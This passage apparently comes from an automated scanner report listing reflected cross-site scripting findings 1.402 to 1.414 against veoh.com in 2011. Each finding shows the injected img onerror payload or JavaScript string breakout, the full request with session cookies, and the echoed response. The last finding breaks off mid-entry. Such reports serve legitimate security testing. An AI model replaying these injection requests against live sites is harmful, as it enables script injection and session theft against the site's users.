X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=43
Content-Length: 76768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventurefbdf3"><img src=a onerror=alert(1)>42b09b361cc/sort/most viewed" selected="selected">
...[SNIP]...

1.402. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v189741093prNNZM5

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8f48<img%20src%3da%20onerror%3dalert(1)>a3fbcd0230a was submitted in the REST URL parameter 4. This input was echoed as f8f48<img src=a onerror=alert(1)>a3fbcd0230a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventuref8f48<img%20src%3da%20onerror%3dalert(1)>a3fbcd0230a/watch/v189741093prNNZM5 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:33 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=20
Content-Length: 76724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuref8f48<img src=a onerror=alert(1)>a3fbcd0230a"}</textarea>
...[SNIP]...

1.403. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v189741093prNNZM5

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22732'%3b900f2443f83 was submitted in the REST URL parameter 6. This input was echoed as 22732';900f2443f83 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v189741093prNNZM522732'%3b900f2443f83 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:44 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'aca1ab27744967658c549c7be43411a8',
'v189741093prNNZM522732';900f2443f83'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.404. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be275<img%20src%3da%20onerror%3dalert(1)>e6d8963fd9 was submitted in the REST URL parameter 4. This input was echoed as be275<img src=a onerror=alert(1)>e6d8963fd9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurebe275<img%20src%3da%20onerror%3dalert(1)>e6d8963fd9/watch/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 76397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurebe275<img src=a onerror=alert(1)>e6d8963fd9"}</textarea>
...[SNIP]...

1.405. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bef9b"><img%20src%3da%20onerror%3dalert(1)>63733810adb was submitted in the REST URL parameter 4. This input was echoed as bef9b"><img src=a onerror=alert(1)>63733810adb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurebef9b"><img%20src%3da%20onerror%3dalert(1)>63733810adb/watch/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:41 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 76451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventurebef9b"><img src=a onerror=alert(1)>63733810adb/sort/most viewed" selected="selected">
...[SNIP]...

1.406. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6a1e'%3b1b1f85b69a1 was submitted in the REST URL parameter 6. This input was echoed as c6a1e';1b1f85b69a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8c6a1e'%3b1b1f85b69a1 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:49 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=9
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'088ee77b63d79318cd9540d1099eeade',
'v18978294NGnK88j8c6a1e';1b1f85b69a1'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.407. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ce45"><img%20src%3da%20onerror%3dalert(1)>b926a16b5e0 was submitted in the REST URL parameter 4. This input was echoed as 5ce45"><img src=a onerror=alert(1)>b926a16b5e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure5ce45"><img%20src%3da%20onerror%3dalert(1)>b926a16b5e0/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=9F8A0036-A353-DB95-6D07-AA38C789D992&LastUpdate=03/Feb/2011:12:31:41 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:41 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:41 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=16
Content-Length: 76451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure5ce45"><img src=a onerror=alert(1)>b926a16b5e0/sort/most viewed" selected="selected">
...[SNIP]...

1.408. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2e455<img%20src%3da%20onerror%3dalert(1)>cd67645eb41 was submitted in the REST URL parameter 4. This input was echoed as 2e455<img src=a onerror=alert(1)>cd67645eb41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure2e455<img%20src%3da%20onerror%3dalert(1)>cd67645eb41/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:55 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:56 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=87
Content-Length: 76407

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure2e455<img src=a onerror=alert(1)>cd67645eb41"}</textarea>
...[SNIP]...

1.409. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a478'%3b93eafa27de4 was submitted in the REST URL parameter 6. This input was echoed as 3a478';93eafa27de4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j83a478'%3b93eafa27de4/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=D47A8979-9A2D-F75C-94BC-F44EB9A27CFA&LastUpdate=03/Feb/2011:12:32:06 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:32:06 GMT; Path=/
Date: Thu, 03 Feb 2011 20:32:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=35
Content-Length: 94943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'1757659a2efcb124c29be93d82aed870',
'v18978294NGnK88j83a478';93eafa27de4'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.410. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4957f"><img%20src%3da%20onerror%3dalert(1)>b411440d815 was submitted in the REST URL parameter 4. This input was echoed as 4957f"><img src=a onerror=alert(1)>b411440d815 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure4957f"><img%20src%3da%20onerror%3dalert(1)>b411440d815/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:38 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:38 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91
Content-Length: 76451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure4957f"><img src=a onerror=alert(1)>b411440d815/sort/most viewed" selected="selected">
...[SNIP]...

1.411. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 19a20<img%20src%3da%20onerror%3dalert(1)>17a886b7f9 was submitted in the REST URL parameter 4. This input was echoed as 19a20<img src=a onerror=alert(1)>17a886b7f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure19a20<img%20src%3da%20onerror%3dalert(1)>17a886b7f9/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=E878E920-D63B-9E1C-A81F-F0235D74FE12&LastUpdate=03/Feb/2011:12:31:53 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:53 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:53 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 76397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure19a20<img src=a onerror=alert(1)>17a886b7f9"}</textarea>
...[SNIP]...

1.412. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8770d'%3bee4aadffdc5 was submitted in the REST URL parameter 6. This input was echoed as 8770d';ee4aadffdc5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j88770d'%3bee4aadffdc5/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=FED204EF-9DC2-336D-4AB6-05EAB5021E64&LastUpdate=03/Feb/2011:12:32:04 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:32:04 GMT; Path=/
Date: Thu, 03 Feb 2011 20:32:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=67
Content-Length: 94943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'9aef285b016775eac1368647ddf6c815',
'v18978294NGnK88j88770d';ee4aadffdc5'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.413. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207484775fTsGMdN

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcf1"><img%20src%3da%20onerror%3dalert(1)>d1e7de81cf0 was submitted in the REST URL parameter 4. This input was echoed as 3bcf1"><img src=a onerror=alert(1)>d1e7de81cf0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure3bcf1"><img%20src%3da%20onerror%3dalert(1)>d1e7de81cf0/watch/v207484775fTsGMdN HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:09 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=33
Content-Length: 75718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure3bcf1"><img src=a onerror=alert(1)>d1e7de81cf0/sort/most viewed" selected="selected">
...[SNIP]...

1.414. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207484775fTsGMdN

Issue detail

